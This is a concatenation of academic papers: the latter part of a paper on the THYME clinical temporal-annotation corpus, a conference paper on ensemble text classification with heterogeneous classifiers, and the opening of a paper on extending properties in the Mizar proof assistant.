after pathology, and resection of the tumor occurs after diagnosis. The presence of the AJCC staging infor- mation in the final sentence (along with the confir- mation of the adenocarcinoma diagnosis) implies a post-surgical pathology exam of the resected spec- imen, as the AJCC staging information cannot be determined without this additional examination. These inferences come naturally to domain ex- perts but are largely inaccessible to people outside the medical community without considerable anno- tator training. Making explicit our understanding of these “understood orderings” is crucial; although they are not marked by human annotators in our schema, the annotators often found it initially frustrating to leave these (purely inferential) relations unstated. Al- though many of our (primarily linguistically trained) annotators learned to see these patterns, we chose to exclude them from the manual task since newer an- notators with varying degrees of domain knowledge may struggle if asked to manually annotate them. Similar unspoken-but-understood orderings are found throughout the clinical domain. As mentioned in Section 3, both Permanence and Contextual As- pect:Intermittent are properties of symptoms and dis- eases themselves, rather than of the patient’s particu- lar situation. As such, these properties could easily Annotation Type Raw Count EVENT 15,769 TIMEX3 1,426 LINK 7935 Total 25,130 Table 1: Raw Frequency of Annotation Types TLINK Type Raw Count % of TLINKs CONTAINS 5,112 64.42% OVERLAP 1,205 15.19% BEFORE 1,004 12.65% BEGINS-ON 488 6.15% ENDS-ON 126 1.59% Total 7,935 100.00% Table 2: Relative Frequency of TLINK types be identified and marked across a medical ontology, and then be automatically assigned to EVENTs rec- ognized as specific medical named entities. Finally, due to the peculiarities of EHR systems, some annotations must be done programatically. Ex- act dates of patient visit (or of pathology/radiology consult) are often recorded as metadata on the EHR itself, rather than within the text, making the canoni- cal DOCTIME (or time of automatic section modifi- cations) difficult to access in de-identified plaintext data, but easy to find automatically. 7 Results We report results on the annotations from the here- released subset of the THYME colon cancer corpus, which includes clinical notes and pathology reports for 35 patients diagnosed with colon cancer for a total of 107 documents. Each note was annotated by a pair of graduate or undergraduate students in Linguistics at the University of Colorado, then adju- dicated by a domain expert. These clinical narratives were sampled from the EHRs of a major healthcare center (the Mayo Clinic). They were deidentified for all patient-sensitive information; however, original dates were retained. 7.1 Descriptive Statistics Table 1 presents the raw counts for events, temporal expressions and links in the adjudicated gold anno- tations. Table 2 presents the number and percentage of TLINKs by type in the adjudicated relations gold annotations. 150 Annotation Type F1-Score Alpha EVENT 0.8038 0.7899 TIMEX3 0.8047 0.6705 LINK: Participants only 0.5012 0.4999 LINK: Participants+type 0.4506 0.4503 LINK: CONTAINS 0.5630 0.5626 Table 3: IAA (F1-Score and Alpha) by annotation type EVENT Property F1-Score Alpha DocTimeRel 0.7189 0.6889 Cont.Aspect 0.9947 0.9930 Cont.Modality 0.9547 0.9420 Table 4: IAA (F1-Score and Alpha) for EVENT properties 7.2 Inter-annotator Agreement We report inter-annotator agreement (IAA) results on the THYME corpus. Each note was annotated by two independent annotators. The final gold standard was produced after disagreement adjudication by a third annotator was performed. We computed the IAA as F1-score and Krippen- dorff’s Alpha (Krippendorff, 2012) by applying clo- sure, using explicitly marked temporal relations to identify others that are not marked but exist implicitly. In the computation of the IAA, inferred-only TLINKs do not contribute to the score, matched or unmatched. For instance, if both annotators mark A BEFORE B and B BEFORE C, to prevent artificially inflating the agreement score, the inferred A BEFORE C is ignored. Likewise, if one annotator marked A BEFORE B and B BEFORE C and the other annotator did not, the inferred A BEFORE C is not counted. However, if one annotator did explicitly mark A BEFORE C, then an equivalent inferred TLINK would be used to match it. EVENT and TIMEX3 IAA was generated based on exact and overlapping spans, respectively. These results are reported in Table 3. The THYME corpus also differs from ISO- TimeML in terms of EVENT properties, with the addition of DocTimeRel, ContextualModality and ContextualAspect. IAA for these properties is in Table 4. 7.3 Baseline Systems To get an idea of how much work will be neces- sary to adapt existing temporal information extrac- tion systems to the clinical domain, we took the freely available ClearTK-TimeML system (Bethard, 2013), TempEval 2013 THYME Corpus P R F1 P R F1 TIMEX3 83.2 71.7 77.0 59.3 42.8 49.7 EVENT 81.4 76.4 78.8 78.9 23.9 36.6 DocTimeRel - - - 47.4 47.4 47.4 LINK7 28.6 30.9 26.6 22.7 18.6 20.4 EVENT-TIMEX3 - - - 32.3 60.7 42.1 EVENT-EVENT - - - 7.0 3.0 4.2 Table 5: Performance of ClearTK-TimeML models, as reported in the TempEval 2013 competition, and as applied to the THYME Corpus development set. which was among the top performing systems in TempEval 2013 (UzZaman et al., 2013), and eval- uated its performance on the THYME corpus. ClearTK-TimeML uses support vector machine classifiers trained on the TempEval 2013 training data, employing a small set of features including character patterns, tokens, stems, part-of-speech tags, nearby nodes in the constituency tree, and a small time word gazetteer. For EVENTs and TIMEX3s, the ClearTK-TimeML system could be applied di- rectly to the THYME corpus. For DocTimeRels, the relation for an EVENT was taken from the TLINK between that EVENT and the document creation time, after mapping INCLUDES to OVERLAP. EVENTs with no such TLINK were assumed to have a Doc- TimeRel of OVERLAP. For other temporal relations, INCLUDES was mapped to CONTAINS. Results of this system on TempEval 2013 and the THYME corpus are shown in Table 5. For time ex- pressions, performance when moving to the clinical data degrades about 25%, from F1 of 77.0 to 49.7. For events, the degradation is much larger, about 40%, from 78.8 to 36.6, most likely because of the large number of clinical symptoms, diseases, disor- ders, etc. which have never been observed by the system during training. Temporal relations are a bit more difficult to compare because TempEval lumped DocTimeRel and other temporal relations together and had several differences in their evaluation met- ric7. However, we at least can see that performance of the ClearTK-TimeML system on temporal rela- tions is low on clinical text, achieving only F1 of 20.4. These results suggest that clinical narratives do 7The TempEval 2013 evaluation metric penalized systems for parts of the text that were not examined by annotators, and used different variants of closure-based precision and recall. 151 indeed present new challenges for temporal informa- tion extraction systems, and that having access to domain specific training data will be crucial for ac- curate extraction in the clinical domain. At the same time, it is encouraging that we were able to apply existing ISO-TimeML-based systems to our corpus, despite the several extensions to ISO-TimeML that were necessary for clinical narratives. 8 Discussion CONTAINS plays a large role in the THYME cor- pus, representing 66% of TLINK annotations made, compared with only 14.6% for OVERLAP, the second most frequent type. We also see that BEFORE links are relatively less common than OVERLAP and CON- TAINS, illustrating that much of the temporal ordering on the timeline is accomplished by using many ver- tical links (CONTAINS, OVERLAP) to build contain- ers, and few horizontal links (BEFORE, BEGINS-ON, ENDS-ON) to order them. IAA on EVENTs and Temporal Expressions is strong, although differentiating implicit EVENTs (which should not be marked) from explicit, mark- able EVENTs remains one of the biggest sources of disagreement. When compared to the data from the 2012 i2b2 challenge (Sun et al., 2013b), our IAA figures are quite similar. Even with our more com- plex schema, we achieved an F1-score of 0.8038 for EVENTs (compared to the i2b2 score of 0.87 for par- tial match). For TIMEX3s, our F1-score was 0.8047, compared to an F1-score of 0.89 for i2b2. TLINKing medical EVENTs remains a very diffi- cult task. By using our narrative container approach to constrain the number of necessary annotations and by eliminating often-confusing inverse relations (like ‘after’ and ‘during’) (neither of which were done for the i2b2 data), we were able to significantly improve on the i2b2 TLINK span agreement F1-score of 0.39, achieving an agreement score of 0.5012 for all LINKs across our corpus. The majority of remaining an- notator disagreement comes from different opinions about whether any two EVENTs require an explicit TLINK between them or an inferred one, rather than what type of TLINK it would be (e.g. BEFORE vs. CONTAINS). Although our results are still signifi- cantly higher than the results reported for i2b2, and in line with previously reported general news figures, we are not satisfied. Improving IAA is an important goal for future work, and with further training, speci- fication, experience, and standardization, we hope to clarify contexts for explicit TLINKS. News-trained temporal information extraction sys- tems see a significant drop in performance when ap- plied to the clinical texts of the THYME corpus. But as the corpus is an extension of ISO-TimeML, future work will be able to train ISO-TimeML compliant systems on the annotations of the THYME corpus to reduce or eliminate this performance gap. Some applications that our work may enable in- clude (1) better understanding of event semantics, such as whether a disease is chronic or acute and its usual natural history, (2) typical event duration for these events, (3) the interaction of general and domain-specific events and their importance in the fi- nal timeline, and, more generally, (4) the importance of rough temporality and narrative containers as a step towards finer-grained timelines. We have several avenues of ongoing and future work. First, we are working to demonstrate the utility of the THYME corpus for training machine learning models. We have designed support vector machine models with constituency tree kernels that were able to reach an F1-score of 0.737 on an EVENT-TIMEX3 narrative container identification task (Miller et al., 2013), and we are working on training models to identify events, times and the remaining types of temporal relations. Second, as per our motivating use cases, we are working to integrate this annotation data with timeline visualization tools and to use these annotations in quality-of-care research. For example, we are using temporal reasoning built on this work to investigate the liver toxicity of methotrexate across a large corpus of EHRs (Lin et al., under review)]. Finally, we plan to explore the application of our notion of an event (anything that should be visible on a domain-appropriate timeline) to other domains. It should transfer naturally to clinical notes about other (non-cancer) conditions, and even to other types of clinical notes, as certain basic events should always be included in a patient’s timeline. Applying our notion of event to more distant domains, such as legal opinions, would require first identifying a consensus within the domain about which events must appear on a timeline. 9 Conclusion Much of the information in clinical notes critical to the construction of a detailed timeline is left implicit by the concise shorthand used by doctors. Many events are referred to only by a term such as “tu- 152 mor”, while properties of the event itself, such as “intermittent”, may not be specified. In addition, the ordering of events on a timeline is often left to the reader to infer, based on domain-specific knowledge. It is incumbent upon the annotation guideline to in- dicate that only informative event orderings should be annotated, while leaving domain-specific order- ings to post-annotation inference. This document has detailed our approach to adapting the existing ISO-TimeML standard to this recovery of implicit information, and defining guidelines that support an- notation within this complex domain. Our guide- lines, as well as the annotated data, are available at http://thyme.healthnlp.org, and the full corpus has been proposed for use in a SemEval 2015 shared task. Acknowledgments The project described is supported by Grant Num- ber R01LM010090 and U54LM008748 from the Na- tional Library Of Medicine. The content is solely the responsibility of the authors and does not necessarily represent the official views of the National Library Of Medicine or the National Institutes of Health. We would also like to thank Dr. Piet C. de Groen and Dr. Brad Erickson at the Mayo Clinic, as well as Dr. William F. Styler III, for their contributions to the schema and to our understanding of the intricacies of clinical language. References James F Allen. 1983. Maintaining knowledge about temporal intervals. Communications of the ACM, 26(11):832–843. Emmon Bach. 1986. The algebra of events. Linguistics and philosophy, 9(1):5–16. Steven Bethard. 2013. Cleartk-timeml: A minimalist ap- proach to tempeval 2013. In Second Joint Conference on Lexical and Computational Semantics (*SEM), Vol- ume 2: Proceedings of the Seventh International Work- shop on Semantic Evaluation (SemEval 2013), pages 10–14, Atlanta, Georgia, USA, June. Association for Computational Linguistics. Olivier Bodenreider. 2004. The Unified Medical Language System (UMLS): integrating biomedical terminology. Nucleic acids research, 32(Database issue):D267–D270, January. Philip Bramsen, Pawan Deshpande, Yoong Keok Lee, and Regina Barzilay. 2006. Finding temporal order in discharge summaries. In AMIA Annual Symposium Proceedings, volume 2006, page 81. American Medical Informatics Association. Carlo Combi, Yuval Shahar, et al. 1997. Temporal reason- ing and temporal data maintenance in medicine: issues and challenges. Computers in biology and medicine, 27(5):353–368. Robert H Dolin. 1995. Modeling the temporal complex- ities of symptoms. Journal of the American Medical Informatics Association, 2(5):323–331. George Hripcsak, Nicholas D Soulakis, Li Li, Frances P Morrison, Albert M Lai, Carol Friedman, Neil S Cal- man, and Farzad Mostashari. 2009. Syndromic surveil- lance using ambulatory electronic health records. Jour- nal of the American Medical Informatics Association, 16(3):354–361. Ann K Irvine, Stephanie W Haas, and Tessa Sullivan. 2008. Tn-ties: A system for extracting temporal infor- mation from emergency department triage notes. In AMIA Annual Symposium proceedings, volume 2008, page 328. American Medical Informatics Association. Elpida T Keravnou. 1997. Temporal abstraction of med- ical data: Deriving periodicity. In Intelligent Data Analysis in Medicine and Pharmacology, pages 61–79. Springer. Klaus H. Krippendorff. 2012. Content Analysis: An Introduction to Its Methodology. SAGE Publications, Inc, third edition edition, April. Chen Lin, Elizabeth Karlson, Dmitriy Dligach, Mon- ica Ramirez, Timothy Miller, Huan Mo, Natalie Braggs, Andrew Cagan, Joshua Denny, and Guer- gana. Savova. under review. Automatic identification of methotrexade-induced liver toxicity in rheumatoid arthritis patients from the electronic medical records. Journal of the Medical Informatics Association. John McCarthy. 2002. Actions and other events in sit- uation calculus. In Proceedings of the International conference on Principles of Knowledge Representation and Reasoning, pages 615–628. Morgan Kaufmann Publishers; 1998. Stéphane M Meystre, Guergana K Savova, Karin C Kipper- Schuler, John F Hurdle, et al. 2008. Extracting infor- mation from textual documents in the electronic health record: a review of recent research. Yearb Med Inform, 35:128–44. Timothy Miller, Steven Bethard, Dmitriy Dligach, Sameer Pradhan, Chen Lin, and Guergana Savova. 2013. Dis- covering temporal narrative containers in clinical text. In Proceedings of the 2013 Workshop on Biomedical Natural Langua ge Processing, pages 18–26, Sofia, Bulgaria, August. Association for Computational Lin- guistics. 153 Eleni Miltsakaki, Rashmi Prasad, Aravind Joshi, and Bon- nie Webber. 2004. The penn discourse treebank. In In Proceedings of LREC 2004. Massimo Poesio. 2004. Discourse annotation and seman- tic annotation in the gnome corpus. In In Proceedings of the ACL Workshop on Discourse Annotation. James Pustejovsky and Amber Stubbs. 2011. Increasing informativeness in temporal annotation. In Proceedings of the 5th Linguistic Annotation Workshop, pages 152– 160. Association for Computational Linguistics. James Pustejovsky, Robert Knippen, Jessica Littman, and Roser Sauri. 2005. Temporal and event information in natural language text. Language Resources and Evalu- ation, 39(2-3):123–164. James Pustejovsky, Kiyong Lee, Harry Bunt, and Laurent Romary. 2010. Iso-timeml: An international standard for semantic annotation. In Proceedings of the Seventh International Conference on Language Resources and Evaluation (LREC 2010), Valletta, Malta. Angus Roberts, Robert Gaizauskas, Mark Hepple, George Demetriou, Yikun Guo, and Ian Roberts. 2009. Build- ing a semantically annotated corpus of clinical texts. Journal of biomedical informatics, 42(5):950–966. Guergana Savova, Steven Bethard, Will Styler, James Mar- tin, Martha Palmer, James Masanz, and Wayne Ward. 2009. Towards temporal relation discovery from the clinical narrative. In AMIA Annual Symposium Pro- ceedings, volume 2009, page 568. American Medical Informatics Association. Tessa Sullivan, Ann Irvine, and Stephanie W Haas. 2008. It’s all relative: usage of relative temporal expressions in triage notes. Proceedings of the American Society for Information Science and Technology, 45(1):1–8. Weiyi Sun, Anna Rumshisky, and Ozlem Uzuner. 2013a. Evaluating temporal relations in clinical text: 2012 i2b2 challenge. Journal of the American Medical Informat- ics Association. Weiyi Sun, Anna Rumshisky, and Ozlem Uzuner. 2013b. Evaluating temporal relations in clinical text: 2012 i2b2 challenge. Journal of the American Medical Informat- ics Association, 20(5):806–813. Alexander Turchin, Maria Shubina, Eugene Breydo, Merri L Pendergrass, and Jonathan S Einbinder. 2009. Comparison of information content of structured and narrative text data sources on the example of medica- tion intensification. Journal of the American Medical Informatics Association, 16(3):362–370. Naushad UzZaman, Hector Llorens, Leon Derczynski, James Allen, Marc Verhagen, and James Pustejovsky. 2013. Semeval-2013 task 1: Tempeval-3: Evaluating time expressions, events, and temporal relations. In Sec- ond Joint Conference on Lexical and Computational Semantics (*SEM), Volume 2: Proceedings of the Sev- enth International Workshop on Semantic Evaluation (SemEval 2013), pages 1–9, Atlanta, Georgia, USA, June. Association for Computational Linguistics. Marc Verhagen. 2005. Temporal Closure in an Annota- tion Environment. Language Resources and Evalua- tion, 39(2):211–241. Veronika Vincze, Gyrgy Szarvas, Richrd Farkas, Gyrgy Mra, and Jnos Csirik. 2008. The bioscope corpus: biomedical texts annotated for uncertainty, negation and their scopes. BMC Bioinformatics, 9(Suppl 11):1– 9. Ying Zhao, George Karypis, and Usama M. Fayyad. 2005. Hierarchical clustering algorithms for docu- ment datasets. Data Mining and Knowledge Discovery, 10:141–168. Jiaping Zheng, Wendy W Chapman, Rebecca S Crowley, and Guergana K Savova. 2011. Coreference resolution: A review of general methodologies and applications in the clinical domain. Journal of biomedical informatics, 44(6):1113–1122. Li Zhou, Simon Parsons, and George Hripcsak. 2008. The evaluation of a temporal reasoning system in processing clinical discharge summaries. Journal of the American Medical Informatics Association, 15(1):99–106. 154 work_dud6jcho45havihrl4d6i4z6iu ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 130 An Ensemble Learning Method for Text Classification Based on Heterogeneous Classifiers Fan Huimin School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: 492896361@ qq.com Li Pengpeng School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: m18295715879@163.com Zhao Yingze School of School of Marxism Xi'an Jiaotong University Xi’an, China e-mail: yingze1013@163.com Li Danyang School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: 821563942@qq.com Abstract—Ensemble learning can improve the accuracy of the classification algorithm and it has been widely used. Traditional ensemble learning methods include bagging, boosting and other methods, both of which are ensemble learning methods based on homogenous base classifiers, and obtain a diversity of base classifiers only through sample perturbation. However, heterogenous base classifiers tend to be more diverse, and multi-angle disturbances tend to obtain a variety of base classifiers. This paper presents a text classification ensemble learning method based on multi-angle perturbation heterogeneous base classifier, and validates the effectiveness of the algorithm through experiments. Keywords-Machine Learning; Ensemble Learning; Text Classification I. INTRODUCTION The main idea of ensemble learning is to generate multiple learners through certain rules and then adopt some integrated strategy to make the final decision[1]. In general, multiple learners in the so-called ensemble learning are all homogenous “weak learners”. Based on these weak learners, multiple learners are generated through sample set perturbation, and a strong learner is obtained after integration. With the deepening of integrated learning, its broad definition gradually accepted by scholars. It refers to a collection of multiple classifiers using learning methods, without distinction between the nature of the classifier。 However, the research of ensemble learning with homogenous classifiers is still the most common, and it is usually only perturbed by a single angle such as algorithm training set[2][3]. The random forest algorithm adds the perturbation of the classification attribute to the traditional bagging algorithm, and thus obtains a better classification effect[4]. This shows that the multi-angle perturbation can produce a larger difference base learner, and the ensemble learning model has higher classification accuracy. In addition, the research shows that the diversity of base learners based on the heterogeneous base classifier is stronger, so the classification model has stronger classification accuracy and generalization performance[5][6]. Therefore, this paper combines the above two factors and designs a text classification ensemble learning method based on multi-angle perturbation heterogeneous base classifier. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 131 II. ENSEMBLE LEARNING "Weak Learning Is Equivalent to Strong Learning" is a theoretical issue raised by Kearns and Valiant in 1989. The Boosting algorithm arises from the proof of this issue. Then the Boosting algorithm derived a number of variants, including Gradient Boosting, LPBoosting and so on. Because of the characteristics of boosting that training classifiers serially, the training process takes up more resources and has lower efficiency. Therefore, whether it is possible to use a few classifiers and obtain the same performance is a matter of concern to researchers. Zhou Zhihua and others on the "selective ensemble"[7][8] of boosting algorithm helped to overcome this problem. "Selective ensemble" only used the classifier with has good classification results to integrate the classifiers. This idea can finish the construction of ensembled model more efficiently without changing the original algorithm that training base classifiers. In recent years, a method of selective integration based on clustering, selection, optimization and other methods has also been developed. The theoretical basis of ensemble learning shows that strongly learner and weak learner are equivalent, so we can find ways to convert weaker learners into strongly learners, without having to look for hard-to-find Learner. Currently there is a representative ensemble learning method boosting, bagging. The traditional Bagging algorithm and Boosting algorithm as well as many derived algorithms of the two algorithms are ensemble learning based on homogenous base classifier. And diversity is only obtained through sample disturbances, while multi-angle disturbances and heterogeneous classifiers can improve model classification accuracy. This paper first trains and integrates homogenous base classifiers, compares and analyzes changes in the accuracy of base classifiers and integrated models, and then integrates k-nearest neighbor classifiers, Bayesian classifiers, and logistic regression classifiers in text classifiers. The integration model of the heterogeneous base classifier compares the diversity with the base classifier homogenous Bagging algorithm to measure the KW value and accuracy. III. ENSEMBLE LEARNING MODEL BASED ON HETEROGENEOUS BASE CLASSIFIER In order to obtain an integrated learning model with higher accuracy, more base classifiers with more diversity and good classification results should be obtained as much as possible. From the perspective of diversity, we can try to select a combination of many "attributes" from the variable factors in the classification process. Here, "attribute" refers to everything that causes the change of the algorithm classification result. From the general process of text classification analysis, feature selection, feature dimension, classifier selection and classifier parameters can be used as a basis for the diversity of the classifier. For each classification model, its algorithm parameters, feature selection algorithm, feature dimension are disturbed. In this paper, many kinds of classifiers are integrated, and an integrated learning model based on multi-angle perturbation heterogeneous basis classifiers is designed. Inputs in the process of model training are feature selection algorithm set S, feature dimension set N, classifier set C, adjustable parameter set A and parameter optional value set (dictionary) V. Training steps are as follows: Step 1: Pre-process the sample set. Step 2: Select an algorithm for each feature, make a feature selection for each feature dimension, and add the feature selection result to the feature selection result list L. Step 3: Perform Step 4 for each classifier. Step 4: Train and save to the classifier list C-output for each parameter of the classifier in combination with eachresult in the L list. The output of the model is the classifier list C-output. The testing process of the model is as follows: After the pre-processing and the vectorization of the sample to be tested, a series of classification models are used to predict the samples to obtain a plurality of classification results. The majority of voting integration strategies lead to the final classification result. The feature selection algorithm, feature dimension, and classifier all serve as a source for the diversity of the base classifiers. In this paper, feature selection algorithm can use chi-square statistics, information gain and mutual 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 132 information algorithm. Classifier perturbation can be trained by Bayesian classifier, k-nearest neighbor classifier and logistic regression classifier. Since the parameters of the classifier are also variables, they can also be used as disturbance variables. IV. EXPERIMENT ANALYSIS The experiment uses Sogou Labs' entire network news dataset, and randomly selects 600 news documents from five categories of financial, education, automotive, entertainment and women, and uses the body part and its category markers as the experimental text data Set (balanced data set). The experiment will use 80% data as the training set and the rest as test sets. A. The impact of changes in featuredimensions. Figure 1. Experiment on the variation of feature dimension between integrated model and single classifier model With the increase of feature dimensions, the accuracy of each model is on the rise. When the number of features is small, the accuracy of the integrated model is only lower than that of the information gain algorithm. When the number of features exceeds 300, the integrated model performs best. It can be seen that the classification effect of the integrated model is not always better than that of a single classifier. When the feature dimension is small, the accuracy of the integrated model is lower than that of the information gain algorithm model. In the experimental results obtained from experimental data in this paper, when the feature dimension exceeds 400 dimensions, the accuracy of the model tends to be stable, and the accuracy of ensemble learning model is always higher than that of a single classifier model. B. The effect of feature selection algorithm and classifiers TABLE I. EXPERIMENT OFTHE PERTURBATION OF FEATURE SELECTION ALGORITHM Type feature selection algorithm classifier accuracy/% Base classifier CHI KNN 79.6 IG 83.8 MI 88.8 Ensembleclassifier Above three kinds 89.6 Base classifier CHI Bayesian 77.8 IG 90.2 MI 82.4 Ensembleclassifier Above three kinds 86.2 Base classifier CHI Logistic regression 79.4 IG 91.4 MI 87.6 Ensembleclassifier Above three kinds 89.2 It can be seen from the experimental results that under the same conditions, the classification results of multiple classifiers combined with multiple feature selection algorithms are quite different. That is to say, the diversity between the base classifiers obtained by the perturbation feature selection algorithm is strong. Therefore, a variety of feature selection algorithms can be used as one of the sources of the base classifiers. As can be seen from Table 1, when the feature selection algorithm is chi-square statistics, information gain or mutual information algorithm, the classification accuracy of the single classifier is lower, and the accuracy of the integrated classifier classification is higher than that of any single classifier. The disturbance of classifier makes the algorithm vary greatly in accuracy, so the disturbance of classifier can also be used as one of the sources of the diversity of classifier. C. Effect of classifier parameters Due to the different settings of the base classifier parameters will lead to some differences between the training model, this paper designed experiments to further examine the accuracy of the basic learning model in the 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 133 disturbance of classifier parameters. The experimental results are shown in Table 2-4. TABLE II. PARAMETER PERTURBATION EXPERIMENT OF K NEAREST NEIGHBOR CLASSIFIER Type K classifier Accuracy/% Base classifier 5 KNN 85.2 10 85.6 15 84.6 20 81.2 25 78.6 30 78 ensemble classifier - - 81.6 TABLE III. PERTURBATION EXPERIMENT OF BAYESIAN CLASSIFIER PARAMETER type Type of classifier classifier Accuracy/% Base classifier Polynomial Bayesian classifier 89.6 Gaussian 91 Bernoulli 84.8 ensemble classifier - - 93.2 TABLE IV. PERTURBATION EXPERIMENT OF LOGISTIC REGRESSION CLASSIFIER PARAMETER Type The way of classification Loss function optimization method classifier Accur acy/% Base classifier One to many liblinear Logistic regressio n 90.6 newton-cg 90.6 lbfgs 90.6 sag 90.8 multi-category newton-cg 90.8 lbfgs 90.8 sag 90.8 ensemble classifier - - - 90.6 From the data in Table 2-4 found: Compared with the above three groups of experiments, the K-nearest neighbor classifier has a strong diversity among the classifiers in the selection of "K value" and the Bayesian classifier perturbation of the "classifier type" parameters. Therefore, Base classifiers with higher classification accuracy are candidates. However, the logistic regression classifier is insensitive to the two parameters of "classification method" and "loss function optimization method". The accuracy of the base classifier is almost constant and the diversity is lower. In the multi-angle perturbation integrated model, only one of the classifiers can be selected. D. Multi-angle disturbance Through the above three groups of experiments, we have screened the selected parameters of the base classifier with strong diversity. From the experimental data obtained from the above three experiments, the KW diversity measure between homogeneity classifiers that make up each classifier can be calculated as shown in Table 5. TABLE V. BASE CLASSIFIER DIVERSITY MEASURE KW VALUE Ensemble learning model Disturb variable KW value KNN Feature Selection Algorithm 0.06 Bayesian classifier 0.05 Logistic regression classifier 0.04 CHI classifier 0.07 IG 0.03 MI 0.05 KNN K value 0.04 Bayesian classifier Classifier type 0.04 Logistic regression classifier Classification and optimization methods 0 Multiangle perturbation heterogeneous basis classifier Multi-angle disturbance 0.07 The range of KW values is [0,1]. When KW is 0 or 1, the base classifiers are the same, and there is no diversity among base classifiers. When KW is 0.25, the base classifier has the highest diversity. As can be seen from table 5, the integrated models with the most diversity of base classifiers in table 5 are all based on heterogeneous base classifiers. The KW value of this model is better than that based on the rest of the integrated learning models. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 134 Using the integrated method, the above feature selection algorithm, feature dimension, classifier and its parameters are taken as input to integrate all the base classifiers, and an integrated model based on multi-angle perturbation heterogeneous base classifiers is obtained. The multi-angle disturbance integrated learning model parameters are summarized in Table 6. TABLE VI. MODEL PARAMETERS variable Value / classifier Classifier property value Feature Selection Algorithm CHI、IG、MI - Characteristic dimension 400、450、500 - Classifier Bayesian classifier Type: Gaussian, Bernoulli, Polynomial Classifier KNN K=5、10、15 Classifier Logistic regression classifier Classification: one to many; optimization methods: sag The parameters shown in Table 6 are used as inputs to the model to train the integrated learning model designed in this paper. Compare this model with the Bagging text classification model with only sample perturbation. The experimental results are shown in Table 7. TABLE VII. THE COMPARISON BETWEEN THE MODEL AND BAGGING MODEL model type variable classifier KW value accuracy/% Bagging Sample disturbance KNN 0.10 83 Bagging Sample disturbance Bayesian 0.03 85.4 Bagging Sample disturbance Logistic regression 0.06 83 Heterogeneous classifier model Multi-angle disturbance - 0.07 92 The experimental results show that the Bagging algorithm based on K-nearest neighbor classifier has higher KW value, that is to say, the classifier has strong diversity but low accuracy. Bagging algorithm based on Bayesian classifier and logistic regression classifier has low KW value and accuracy, that is, the base classifier has less diversity and low accuracy. The integrated learning model based on multi-angle disturbance heterogeneous basis classifier designed in this paper has the highest classification accuracy and the strong diversity of base classifiers. V. CONCLUSION This paper analyzes the algorithmic process of Bagging and Boosting, and finds that both of them are integrated learning strategies based on homogeneity classifier. At present, the research on heterogeneous base classifier integrated learning is less. In this paper, we design a learning model of multi-angle perturbation heterogeneous basis classifier. Multi-angle perturbation of heterogeneous classifiers, and try to integrate them. The experimental results show that the integrated learning model based on multi-angle perturbation-based heterogeneous base classifiers proposed and designed in this paper has higher classification accuracy and rich base classifier diversity. This will provide an important basis for further research on heterogeneous classifier integration. REFERENCES [1] Lai J H. Ensemble Learning for Text Classification[J]. 2017. [2] Wang G, Sun J, Ma J, et al. Sentiment classification: The contribution of ensemble learning[J]. Decision support systems, 2014, 57: 77-93. [3] Xia R, Zong C, Li S. Ensemble of feature sets and classification algorithms for sentiment classification[J]. Information Sciences, 2011, 181(6): 1138-1152. [4] Jia J, Liu Z, Xiao X, et al. pSuc-Lys: predict lysine succinylation sites in proteins with PseAAC and ensemble random forest approach[J]. Journal of theoretical biology, 2016, 394: 223-230. [5] Rodriguez J J, Kuncheva L I, Alonso C J. Rotation forest: A new classifier ensemble method[J]. IEEE transactions on pattern analysis and machine intelligence, 2006, 28(10): 1619-1630. [6] Wu Z, Lin W, Zhang Z, et al. An Ensemble Random Forest Algorithm for Insurance Big Data Analysis[C]//Computational Science and Engineering (CSE) and Embedded and Ubiquitous Computing (EUC), 2017 IEEE International Conference on. IEEE, 2017, 1: 531-536. [7] Li N, Jiang Y, Zhou Z H. Multi-label Selective Ensemble[C]//International Workshop on Multiple Classifier Systems. Springer, Cham, 2015: 76-88. [8] Qian C, Yu Y, Zhou Z H. Pareto Ensemble Pruning[C]//AAAI. 2015: 2935-2941. work_dunvealesnba5i44lf4b6hxbni ---- Submitted 25 June 2020 Accepted 29 October 2020 Published 30 November 2020 Corresponding author Artur Korniłowicz, arturk@math.uwb.edu.pl Academic editor Marieke Huisman Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.320 Copyright 2020 Korniłowicz Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Enhancement of properties in Mizar Artur Korniłowicz Institute of Computer Science, University of Bialystok, Bialystok, Poland ABSTRACT A ‘‘property’’ in the Mizar proof-assistant is a construction that can be used to register chosen features of predicates (e.g., ‘‘reflexivity’’, ‘‘symmetry’’), operations (e.g., ‘‘involutiveness’’, ‘‘commutativity’’) and types (e.g., ‘‘sethoodness’’) declared at the definition stage. The current implementation of Mizar allows using properties for notions with a specific number of visible arguments (e.g., reflexivity for a predicate with two visible arguments and involutiveness for an operation with just one visible argument). In this paper we investigate a more general approach to overcome these limitations. We propose an extension of the Mizar language and a corresponding enhancement of the Mizar proof-checker which allow declaring properties of notions of arbitrary arity with respect to explicitly indicated arguments. Moreover, we introduce a new property—the ‘‘fixedpoint-free’’ property of unary operations—meaning that the result of applying the operation to its argument always differs from the argument. Results of tests conducted on the Mizar Mathematical Library are presented. Subjects Digital Libraries, Theory and Formal Methods, Programming Languages Keywords Formal verification, Mizar proof-assistant, Mizar Mathematical Library INTRODUCTION Classical mathematical papers consist of sequences of definitions and justified facts classified into several categories like: theorems, lemmas, corollaries, and so on, often interspersed with some examples and descriptions. Mathematical documents prepared using various proof-assistants (e.g., Isabelle (Isabelle, 2020), HOL Light (HOL Light, 2020), Coq (Coq, 2020), Metamath (Metamath, 2020), Lean (Lean, 2020), and Mizar (Mizar, 2020)) can also contain other constructions that are processable by dedicated software. In the case of the Mizar system (Bancerek et al., 2015; Grabowski, Korniłowicz & Naumowicz, 2010) such constructions are: 1. existential, conditional and functorial registrations which enhance processing adjectives (Naumowicz, 2009), 2. term reductions which reduce terms to their proper sub-terms (Korniłowicz, 2013), 3. term identifications which identify equivalent notions from different theo- ries (Grabowski, Korniłowicz & Naumowicz, 2010), and 4. properties which can declare chosen properties of predicates, functors and types at the stage of their definitions (Naumowicz & Byliński, 2004). The current implementation of the Mizar proof-assistant allows using properties for notions with a specific number of visible arguments. Visible arguments are those which are explicitly used in 